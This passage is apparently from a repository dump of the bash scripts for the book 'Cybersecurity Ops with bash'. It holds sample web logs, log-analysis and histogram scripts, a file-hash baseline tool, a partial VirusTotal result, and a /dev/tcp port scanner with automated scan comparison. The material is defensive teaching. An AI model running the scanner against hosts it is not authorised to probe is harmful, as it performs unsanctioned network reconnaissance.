\"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/contact.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3413 \"http://192.168.0.35/contact.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 \"http://192.168.0.35/contact.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:18 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/iPad.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/contact.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] \"GET /request-quote.html HTTP/1.1\" 200 7326 \"http://192.168.0.35/contact.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1429 
\"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:31 -0500] \"GET /files/theme/images/select-arrowaf0e.png?1509483497 HTTP/1.1\" 200 1385 \"http://192.168.0.35/files/main_styleaf0e.css?1509483497\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] \"GET /about.html HTTP/1.1\" 200 7042 \"http://192.168.0.35/request-quote.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1430 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:45 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:25:46 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] \"GET 
/consulting.html HTTP/1.1\" 200 7269 \"http://192.168.0.35/about.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] \"GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1\" 200 3414 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] \"GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1\" 200 19444 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.37 - - [12/Nov/2017:19:26:04 -0500] \"GET /files/theme/custom49c2.js?1490908488 HTTP/1.1\" 200 1430 \"http://192.168.0.35/consulting.html\" \"Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] \"GET /resources.html HTTP/1.1\" 200 7569 \"http://192.168.0.35/risk.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] \"GET /files/main_styleaf0e.css?1509483497 HTTP/1.1\" 200 5022 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n192.168.0.11 - - [12/Nov/2017:19:26:09 -0500] \"GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1\" 200 5011 \"http://192.168.0.35/resources.html\" \"Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0\"\n"
  },
  {
    "path": "ch07/countem.awk",
    "content": "# Cybersecurity Ops with bash\n# countem.awk\n#\n# Description: \n# Count the number of instances of an item using awk\n#\n# Usage:\n# countem.awk < inputfile\n#\n\nawk '{ cnt[$1]++ }\nEND { for (id in cnt) {\n        printf \"%d %s\\n\", cnt[id], id\n      }\n    }'\n"
  },
  {
    "path": "ch07/countem.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# countem.sh\n#\n# Description: \n# Count the number of instances of an item using bash\n#\n# Usage:\n# countem.sh < inputfile\n#\n\ndeclare -A cnt        # assoc. array             # <1>\nwhile read id xtra                               # <2>\ndo\n    let cnt[$id]++                               # <3>\ndone\n# now display what we counted\n# for each key in the (key, value) assoc. array\nfor id in \"${!cnt[@]}\"                           # <4>\ndo    \n\tprintf '%s %d\\n'  \"$id\"  \"${cnt[$id]}\"       # <5>\ndone\n"
  },
  {
    "path": "ch07/histogram.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# histogram.sh\n#\n# Description: \n# Generate a horizontal bar chart of specified data\n#\n# Usage: ./histogram.sh\n#   input format: label value\n#\n\nfunction pr_bar ()                            # <1>\n{\n    local -i i raw maxraw scaled              # <2>\n    raw=$1\n    maxraw=$2\n    ((scaled=(MAXBAR*raw)/maxraw))            # <3>\n    # min size guarantee\n    ((raw > 0 && scaled == 0)) && scaled=1\t\t\t\t# <4>\n\n    for((i=0; i<scaled; i++)) ; do printf '#' ; done\n    printf '\\n'\n    \n} # pr_bar\n\n#\n# \"main\"\n#\ndeclare -A RA\t\t\t\t\t\t# <5>\ndeclare -i MAXBAR max\nmax=0\nMAXBAR=50\t# how large the largest bar should be\n\nwhile read labl val\ndo\n    let RA[$labl]=$val\t\t\t\t\t# <6>\n    # keep the largest value; for scaling\n    (( val > max )) && max=$val\ndone\n\n# scale and print it\nfor labl in \"${!RA[@]}\"\t\t\t\t\t# <7>\ndo\n    printf '%-20.20s  ' \"$labl\"\n    pr_bar ${RA[$labl]} $max\t\t\t\t# <8>\ndone\n"
  },
  {
    "path": "ch07/histogram_plain.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# histogram_plain.sh\n#\n# Description: \n# Generate a horizontal bar chart of specified data without\n# using associative arrays, good for older versions of bash\n#\n# Usage: ./histogram_plain.sh\n#   input format: label value\n#\n\ndeclare -a RA_key RA_val                                 # <1>\ndeclare -i max ndx\nmax=0\nmaxbar=50    # how large the largest bar should be\n\nndx=0\nwhile read labl val\ndo\n    RA_key[$ndx]=$labl                                   # <2>\n    RA_value[$ndx]=$val\n    # keep the largest value; for scaling\n    (( val > max )) && max=$val \n    let ndx++\ndone\n\n# scale and print it\nfor ((j=0; j<ndx; j++))                                  # <3>\ndo\n    printf \"%-20.20s  \" ${RA_key[$j]}\n    pr_bar ${RA_value[$j]} $max\ndone\n"
  },
  {
    "path": "ch07/pagereq.awk",
    "content": "# Cybersecurity Ops with bash\n# pagereq.awk\n#\n# Description: \n# Count the number of page requests for a given IP address using awk\n#\n# Usage:\n# pagereq <ip address> < inputfile\n#   <ip address> IP address to search for\n#\n\n# count the number of page requests from an address ($1)\nawk -v page=\"$1\" '{ if ($1==page) {cnt[$7]+=1 } }                # <1>\nEND { for (id in cnt) {                                          # <2>\n    printf \"%8d %s\\n\", cnt[id], id\n    }\n}'\n"
  },
  {
    "path": "ch07/pagereq.sh",
    "content": "# Cybersecurity Ops with bash\n# pagereq.sh\n#\n# Description: \n# Count the number of page requests for a given IP address using bash\n#\n# Usage:\n# pagereq <ip address> < inputfile\n#   <ip address> IP address to search for\n#\n\ndeclare -A cnt                                             # <1>\nwhile read addr d1 d2 datim gmtoff getr page therest\ndo\n    if [[ $1 == $addr ]] ; then let cnt[$page]+=1 ; fi\ndone\nfor id in ${!cnt[@]}                                       # <2>\ndo\n    printf \"%8d %s\\n\" ${cnt[$id]} $id\ndone\n"
  },
  {
    "path": "ch07/summer.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# summer.sh\n#\n# Description: \n# Sum the total of field 2 values for each unique field 1\n#\n# Usage: ./summer.sh\n#   input format: <name> <number>\n#\n\ndeclare -A cnt        # assoc. array\nwhile read id count\ndo\n  let cnt[$id]+=$count\ndone\nfor id in \"${!cnt[@]}\"\ndo\n    printf \"%-15s %8d\\n\"  \"${id}\"  \"${cnt[${id}]}\" #<1>\ndone\n"
  },
  {
    "path": "ch07/useragents.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# useragents.sh\n#\n# Description: \n# Read through a log looking for unknown user agents\n#\n# Usage: ./useragents.sh  <  <inputfile>\n#   <inputfile> Apache access log\n#\n\n\n# mismatch - search through the array of known names\n#  returns 1 (false) if it finds a match\n#  returns 0 (true) if there is no match\nfunction mismatch ()                                    # <1>\n{\n    local -i i                                          # <2>\n    for ((i=0; i<$KNSIZE; i++))\n    do\n        [[ \"$1\" =~ .*${KNOWN[$i]}.* ]] && return 1      # <3>\n    done\n    return 0\n}\n\n# read up the known ones\nreadarray -t KNOWN < \"useragents.txt\"                      # <4>\nKNSIZE=${#KNOWN[@]}                                     # <5>\n\n# preprocess logfile (stdin) to pick out ipaddr and user agent \nawk -F'\"' '{print $1, $6}' | \\\nwhile read ipaddr dash1 dash2 dtstamp delta useragent   # <6>\ndo\n    if mismatch \"$useragent\"\n    then\n        echo \"anomaly: $ipaddr $useragent\"\n    fi\ndone\n"
  },
  {
    "path": "ch07/useragents.txt",
    "content": "Firefox\nChrome\nSafari\nEdge\n"
  },
  {
    "path": "ch08/livebar.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# livebar.sh\n#\n# Description: \n# Creates a rolling horizontal bar chart of live data\n#\n# Usage:\n# <output from other script or program> | bash livebar.sh\n#\n\nfunction pr_bar ()\t\t\t\t\t# <1>\n{\n    local raw maxraw scaled\n    raw=$1\n    maxraw=$2\n    ((scaled=(maxbar*raw)/maxraw))\n    ((scaled == 0)) && scaled=1\t\t# min size guarantee\n    for((i=0; i<scaled; i++)) ; do printf '#' ; done\n    printf '\\n'\n    \n} # pr_bar\n\n\nmaxbar=60   # largest no. of chars in a bar\t\t# <2>\nMAX=60\nwhile read dayst timst qty\ndo\n    if (( qty > MAX ))\t\t\t\t\t# <3>\n    then\n\tlet MAX=$qty+$qty/4\t# allow some room\n\techo \"              **** rescaling: MAX=$MAX\"\n    fi\n    printf '%6.6s %6.6s %4d:' $dayst $timst $qty\t# <4>\n    pr_bar $qty $MAX\ndone\n"
  },
  {
    "path": "ch08/looper.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# looper.sh\n#\n# Description: \n# Count the lines in a file being tailed -f\n# Report the count interval on every SIGUSR1\n#\n# Usage: ./looper.sh [filename]\n#   filename of file to be tailed, default: log.file\n# \n\nfunction interval ()\t\t\t\t\t# <1>\n{\n    echo $(date '+%y%m%d %H%M%S') $cnt\t\t\t# <2>\n    cnt=0\n}\n\ndeclare -i cnt=0\ntrap interval SIGUSR1\t\t\t\t\t# <3>\n\nshopt -s lastpipe\t\t\t\t\t# <4>\n\ntail -f --pid=$$ ${1:-log.file} | while read aline\t# <5>\ndo\n    let cnt++\ndone\n"
  },
  {
    "path": "ch08/tailcount.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# tailcount.sh\n#\n# Description: \n# Count lines every n seconds\n#\n# Usage: ./tailcount.sh [filename]\n#   filename: passed to looper.sh\n#\n\n# cleanup - the other processes on exit\nfunction cleanup ()\n{\n  [[ -n $LOPID ]] && kill $LOPID\t\t# <1>\n}\n\ntrap cleanup EXIT \t\t\t\t# <2>\n\nbash looper.sh $1 &\t\t\t\t# <3>\nLOPID=$!\t\t\t\t\t# <4>\n# give it a chance to start up\nsleep 3\n\nwhile true\ndo\n    kill -SIGUSR1 $LOPID\n    sleep 5\ndone >&2\t\t\t\t\t# <5>\n"
  },
  {
    "path": "ch08/wintail.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# wintail.sh\n#\n# Description: \n# Perform a tail-like function on a Windows log\n#\n# Usage: ./wintail.sh \n#\n\nWINLOG=\"Application\"  #<1>\n\nLASTLOG=$(wevtutil qe \"$WINLOG\" //c:1 //rd:true //f:text)  #<2>\n\nwhile true\ndo\n\tCURRENTLOG=$(wevtutil qe \"$WINLOG\" //c:1 //rd:true //f:text)  #<3>\n\tif [[ \"$CURRENTLOG\" != \"$LASTLOG\" ]]\n\tthen\t\t\n\t\techo \"$CURRENTLOG\"\n\t\techo \"----------------------------------\"\n\t\tLASTLOG=\"$CURRENTLOG\"\n\tfi\ndone\n"
  },
  {
    "path": "ch09/autoscan.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# autoscan.sh\n#\n# Description: \n# Automatically performs a port scan (using scan.sh), \n# compares output to previous results, and emails user\n# Assumes that scan.sh is in the current directory.\n#\n# Usage: ./autoscan.sh\n#\n\n./scan.sh < hostlist                                      # <1>\n\nFILELIST=$(ls scan_* | tail -2)                           # <2>\nFILES=( $FILELIST )\n\nTMPFILE=$(tempfile)                                       # <3>\n\n./fd2.sh ${FILES[0]} ${FILES[1]}  > $TMPFILE\n\nif [[ -s $TMPFILE ]]   # non-empty                        # <4>\nthen\n    echo \"mailing today's port differences to $USER\"\n    mail -s \"today's port differences\" $USER < $TMPFILE   # <5>\nfi\n# clean up\nrm -f $TMPFILE                                            # <6>\n"
  },
  {
    "path": "ch09/fd2.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# fd2.sh\n#\n# Description: \n# Compares two port scans to find changes\n# MAJOR ASSUMPTION: both files have the same # of lines,\n# each line with the same host address\n# though with possibly different listed ports\n#\n# Usage: ./fd2.sh <file1> <file2>\n#\n\n# look for \"$LOOKFOR\" in the list of args to this function\n# returns true (0) if it is not in the list\nfunction NotInList ()                                            # <1>\n{\n    for port in \"$@\"\n    do\n        if [[ $port == $LOOKFOR ]]\n        then\n            return 1\n        fi\n    done\n    return 0\n}\n\nwhile true\ndo\n    read aline <&4 || break         # at EOF                  # <2>\n    read bline <&5 || break         # at EOF, for symmetry    # <3>\n\n    # if [[ $aline == $bline ]] ; then continue; fi\n    [[ $aline == $bline ]] && continue;                       # <4>\n\n    # there's a difference, so we\n    # subdivide into host and ports\n    HOSTA=${aline%% *}                                        # <5>\n    PORTSA=( ${aline#* } )                                    # <6>\n\n    HOSTB=${bline%% *}\n    PORTSB=( ${bline#* } )\n\n    echo $HOSTA                 # identify the host which changed\n\n    for porta in ${PORTSA[@]}\n    do         # <7>\n          LOOKFOR=$porta NotInList ${PORTSB[@]} && echo \"  closed: $porta\"\n    done\n\n    for portb in ${PORTSB[@]}\n    do\n          LOOKFOR=$portb NotInList ${PORTSA[@]} && echo \"     new: $portb\"\n    done\n\ndone 4< ${1:-day1.data} 5< ${2:-day2.data}                   # <8>\n# day1.data and day2.data are default names to make it easier to test\n"
  },
  {
    "path": "ch09/scan.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# scan.sh\n#\n# Description: \n# Perform a port scan of a specified host\n#\n# Usage: ./scan.sh <output file>\n#   <output file> File to save results in\n#\n\nfunction scan ()\n{\n  host=$1\n  printf '%s' \"$host\"                                       # <1>\n  for ((port=1;port<1024;port++))\n  do\n    # order of redirects is important for 2 reasons:\n    # 2>&1 must follow >/dev/null so that stderr is discarded too, and both\n    # must precede the /dev/tcp redirect so a failed connect prints nothing\n    echo >/dev/null 2>&1  < /dev/tcp/${host}/${port}        # <2>\n    if (($? == 0)) ; then printf ' %d' \"${port}\" ; fi       # <3>\n  done\n  echo # or printf '\\n'\n}\n\n#\n# main loop\n#    read in each host name (from stdin)\n#     and scan for open ports\n#    save the results in a file\n#    whose name is supplied as an argument\n#     or default to one based on today's date\n#\n\nprintf -v TODAY 'scan_%(%F)T' -1   # e.g., scan_2017-11-27  # <4>\nOUTFILE=${1:-$TODAY}                                        # <5>\n\nwhile read HOSTNAME\ndo\n    scan $HOSTNAME\ndone > $OUTFILE                                             # <6>\n"
  },
  {
    "path": "ch10/baseline.sh",
    "content": "#!/bin/bash\n\n# baseline.sh - compare baselines\n#              and report on differences\n#\n\nfunction usageErr ()\n{\n    echo 'usage: baseline.sh [-d path] file1 [file2]'\n    echo 'creates or compares a baseline from path'\n    echo 'default for path is /'\n    exit 2\n} >&2                                                          # <1>\n\nfunction dosumming ()\n{\n    find \"${DIR[@]}\" -type f | xargs -d '\\n' sha1sum           # <2>\n}\n\n# ===============================\n# MAIN\n# ===============================\n\ndeclare -a DIR\n\n# ---------- parse the arguments \n\nwhile getopts \"d:\" MYOPT                                   # <3>\ndo\n    # no check for MYOPT since there is only one choice\n    DIR+=( \"$OPTARG\" )                                     # <4>\ndone\nshift $((OPTIND-1))                                        # <5>\n\n# no arguments? too many?\n(( $# == 0 || $# > 2 )) &&  usageErr \n\n(( ${#DIR[*]} == 0 )) && DIR=( \"/\" )                       # <6>\n\n\n# create either a baseline (only 1 filename provided)\n# or a secondary summary (when two filenames are provided)\n\nBASE=\"$1\"\nB2ND=\"$2\"\n\nif (( $# == 1 ))    # only 1 arg.\nthen\n    # creating \"$BASE\"\n    dosumming > \"$BASE\" \n    # all done for baseline\n    exit\nfi\n\nif [[ ! -r \"$BASE\" ]]\nthen\n    usageErr\nfi\n\n# --------- on to the actual work:\n\n# if 2nd file exists just compare the two\n# else create/fill it\nif [[ ! -e \"$B2ND\" ]]\nthen\n    echo creating \"$B2ND\"\n    dosumming > \"$B2ND\"\nfi\n\n# now we have: 2 files created by sha1sum\ndeclare -A BYPATH BYHASH INUSE \t# assoc. 
arrays\n\n# load up the first file as the baseline\nwhile read HNUM FN\ndo\n    BYPATH[\"$FN\"]=$HNUM\n    BYHASH[$HNUM]=\"$FN\"\n    INUSE[\"$FN\"]=\"X\"\ndone < \"$BASE\"\n\n# ------ now begin the output\n# see if each filename listed in the 2nd file is in\n# the same place (path) as in the 1st (the baseline)\n\nprintf '<filesystem host=\"%s\" dir=\"%s\">\\n' \"$HOSTNAME\"  \"${DIR[*]}\"\n\nwhile read HNUM FN\t\t\t\t\t# <7>\ndo\n    WASHASH=\"${BYPATH[${FN}]}\"\n    # did it find one? if not, it will be null\n    if [[ -z $WASHASH ]]\n    then\n\tALTFN=\"${BYHASH[$HNUM]}\"\n\tif [[ -z $ALTFN ]]\n\tthen\n\t    printf '  <new>%s</new>\\n' \"$FN\"\n\telse\n\t    printf '  <relocated orig=\"%s\">%s</relocated>\\n' \"$ALTFN\" \"$FN\"\n\t    INUSE[\"$ALTFN\"]='_'\t# mark this as seen\n\tfi\n    else\n\tINUSE[\"$FN\"]='_'\t# mark this as seen\n\tif [[ $HNUM == $WASHASH ]]\n\tthen\n\t    continue;\t\t# nothing changed;\n\telse\n\t    printf '  <changed>%s</changed>\\n' \"$FN\"\n\tfi\n    fi\ndone < \"$B2ND\"                                          # <8>\n\nfor FN in \"${!INUSE[@]}\"\ndo\n    if [[ \"${INUSE[$FN]}\" == 'X' ]]\n    then\n        printf '  <removed>%s</removed>\\n' \"$FN\"\n    fi\ndone\n\nprintf '</filesystem>\\n'\n\n"
  },
  {
    "path": "ch11/Calc_VT.txt",
    "content": "{\"scans\": {\"Bkav\": {\"detected\": false, \"version\": \"1.3.0.9466\", \"result\": null, \"update\": \"20180712\"}, \"MicroWorld-eScan\": {\"detected\": false, \"version\": \"14.0.297.0\", \"result\": null, \"update\": \"20180712\"}, \"VBA32\": {\"detected\": false, \"version\": \"3.12.32.0\", \"result\": null, \"update\": \"20180712\"}, \"CMC\": {\"detected\": false, \"version\": \"1.1.0.977\", \"result\": null, \"update\": \"20180712\"}, \"CAT-QuickHeal\": {\"detected\": false, \"version\": \"14.00\", \"result\": null, \"update\": \"20180712\"}, \"McAfee\": {\"detected\": false, \"version\": \"6.0.6.653\", \"result\": null, \"update\": \"20180712\"}, \"Cylance\": {\"detected\": true, \"version\": \"2.3.1.101\", \"result\": \"Unsafe\", \"update\": \"20180712\"}, \"AegisLab\": {\"detected\": false, \"version\": \"4.2\", \"result\": null, \"update\": \"20180712\"}, \"CrowdStrike\": {\"detected\": false, \"version\": \"1.0\", \"result\": null, \"update\": \"20180530\"}, \"K7GW\": {\"detected\": false, \"version\": \"10.53.27735\", \"result\": null, \"update\": \"20180712\"}, \"K7AntiVirus\": {\"detected\": false, \"version\": \"10.53.27740\", \"result\": null, \"update\": \"20180712\"}, \"TheHacker\": {\"detected\": false, \"version\": \"6.8.0.5.3314\", \"result\": null, \"update\": \"20180712\"}, \"TrendMicro\": {\"detected\": false, \"version\": \"10.0.0.1040\", \"result\": null, \"update\": \"20180712\"}, \"Baidu\": {\"detected\": false, \"version\": \"1.0.0.2\", \"result\": null, \"update\": \"20180712\"}, \"NANO-Antivirus\": {\"detected\": false, \"version\": \"1.0.116.23366\", \"result\": null, \"update\": \"20180712\"}, \"F-Prot\": {\"detected\": false, \"version\": \"4.7.1.166\", \"result\": null, \"update\": \"20180712\"}, \"Symantec\": {\"detected\": false, \"version\": \"1.6.0.0\", \"result\": null, \"update\": \"20180712\"}, \"ESET-NOD32\": {\"detected\": false, \"version\": \"17703\", \"result\": null, \"update\": \"20180712\"}, 
\"TrendMicro-HouseCall\": {\"detected\": false, \"version\": \"9.950.0.1006\", \"result\": null, \"update\": \"20180712\"}, \"Paloalto\": {\"detected\": false, \"version\": \"1.0\", \"result\": null, \"update\": \"20180712\"}, \"ClamAV\": {\"detected\": false, \"version\": \"0.100.1.0\", \"result\": null, \"update\": \"20180712\"}, \"Kaspersky\": {\"detected\": false, \"version\": \"15.0.1.13\", \"result\": null, \"update\": \"20180712\"}, \"BitDefender\": {\"detected\": false, \"version\": \"7.2\", \"result\": null, \"update\": \"20180712\"}, \"Babable\": {\"detected\": false, \"version\": \"9107201\", \"result\": null, \"update\": \"20180406\"}, \"ViRobot\": {\"detected\": false, \"version\": \"2014.3.20.0\", \"result\": null, \"update\": \"20180712\"}, \"Avast\": {\"detected\": false, \"version\": \"18.4.3895.0\", \"result\": null, \"update\": \"20180712\"}, \"Tencent\": {\"detected\": false, \"version\": \"1.0.0.1\", \"result\": null, \"update\": \"20180712\"}, \"Endgame\": {\"detected\": false, \"version\": \"3.0.0\", \"result\": null, \"update\": \"20180711\"}, \"Sophos\": {\"detected\": false, \"version\": \"4.98.0\", \"result\": null, \"update\": \"20180712\"}, \"Comodo\": {\"detected\": false, \"version\": \"29334\", \"result\": null, \"update\": \"20180712\"}, \"F-Secure\": {\"detected\": false, \"version\": \"11.0.19100.45\", \"result\": null, \"update\": \"20180712\"}, \"DrWeb\": {\"detected\": false, \"version\": \"7.0.33.6080\", \"result\": null, \"update\": \"20180712\"}, \"VIPRE\": {\"detected\": false, \"version\": \"68060\", \"result\": null, \"update\": \"20180712\"}, \"Invincea\": {\"detected\": false, \"version\": \"6.3.5.26121\", \"result\": null, \"update\": \"20180601\"}, \"McAfee-GW-Edition\": {\"detected\": false, \"version\": \"v2017.3010\", \"result\": null, \"update\": \"20180712\"}, \"Emsisoft\": {\"detected\": false, \"version\": \"2018.4.0.1029\", \"result\": null, \"update\": \"20180712\"}, \"SentinelOne\": {\"detected\": false, 
\"version\": \"1.0.17.227\", \"result\": null, \"update\": \"20180701\"}, \"Cyren\": {\"detected\": false, \"version\": \"6.0.0.4\", \"result\": null, \"update\": \"20180712\"}, \"Jiangmin\": {\"detected\": false, \"version\": \"16.0.100\", \"result\": null, \"update\": \"20180712\"}, \"Webroot\": {\"detected\": false, \"version\": \"1.0.0.403\", \"result\": null, \"update\": \"20180712\"}, \"Avira\": {\"detected\": false, \"version\": \"8.3.3.6\", \"result\": null, \"update\": \"20180710\"}, \"MAX\": {\"detected\": false, \"version\": \"2017.11.15.1\", \"result\": null, \"update\": \"20180712\"}, \"Antiy-AVL\": {\"detected\": false, \"version\": \"3.0.0.1\", \"result\": null, \"update\": \"20180712\"}, \"Kingsoft\": {\"detected\": false, \"version\": \"2013.8.14.323\", \"result\": null, \"update\": \"20180712\"}, \"Microsoft\": {\"detected\": false, \"version\": \"1.1.15000.2\", \"result\": null, \"update\": \"20180712\"}, \"Arcabit\": {\"detected\": false, \"version\": \"1.0.0.831\", \"result\": null, \"update\": \"20180712\"}, \"SUPERAntiSpyware\": {\"detected\": false, \"version\": \"5.6.0.1032\", \"result\": null, \"update\": \"20180712\"}, \"ZoneAlarm\": {\"detected\": false, \"version\": \"1.0\", \"result\": null, \"update\": \"20180712\"}, \"Avast-Mobile\": {\"detected\": false, \"version\": \"180711-22\", \"result\": null, \"update\": \"20180712\"}, \"GData\": {\"detected\": false, \"version\": \"A:25.17758B:25.12706\", \"result\": null, \"update\": \"20180712\"}, \"AhnLab-V3\": {\"detected\": false, \"version\": \"3.13.1.21452\", \"result\": null, \"update\": \"20180712\"}, \"ALYac\": {\"detected\": false, \"version\": \"1.1.1.5\", \"result\": null, \"update\": \"20180712\"}, \"AVware\": {\"detected\": false, \"version\": \"1.6.0.52\", \"result\": null, \"update\": \"20180712\"}, \"TACHYON\": {\"detected\": false, \"version\": \"2018-07-12.02\", \"result\": null, \"update\": \"20180712\"}, \"Ad-Aware\": {\"detected\": false, \"version\": \"3.0.5.370\", 
\"result\": null, \"update\": \"20180712\"}, \"Malwarebytes\": {\"detected\": false, \"version\": \"2.1.1.1115\", \"result\": null, \"update\": \"20180712\"}, \"Zoner\": {\"detected\": false, \"version\": \"1.0\", \"result\": null, \"update\": \"20180711\"}, \"Rising\": {\"detected\": false, \"version\": \"25.0.0.20\", \"result\": null, \"update\": \"20180712\"}, \"Yandex\": {\"detected\": false, \"version\": \"5.5.1.3\", \"result\": null, \"update\": \"20180712\"}, \"Ikarus\": {\"detected\": false, \"version\": \"0.1.5.2\", \"result\": null, \"update\": \"20180712\"}, \"eGambit\": {\"detected\": false, \"version\": null, \"result\": null, \"update\": \"20180712\"}, \"Fortinet\": {\"detected\": false, \"version\": \"5.4.247.0\", \"result\": null, \"update\": \"20180712\"}, \"AVG\": {\"detected\": false, \"version\": \"18.4.3895.0\", \"result\": null, \"update\": \"20180712\"}, \"Cybereason\": {\"detected\": false, \"version\": \"1.2.27\", \"result\": null, \"update\": \"20180225\"}, \"Panda\": {\"detected\": false, \"version\": \"4.6.4.2\", \"result\": null, \"update\": \"20180712\"}, \"Qihoo-360\": {\"detected\": false, \"version\": \"1.0.0.1120\", \"result\": null, \"update\": \"20180712\"}}, \"scan_id\": \"284674a806bcbe692c76761baaf21327638de0c7135bfb06953648be7d661fbd-1531411370\", \"sha1\": 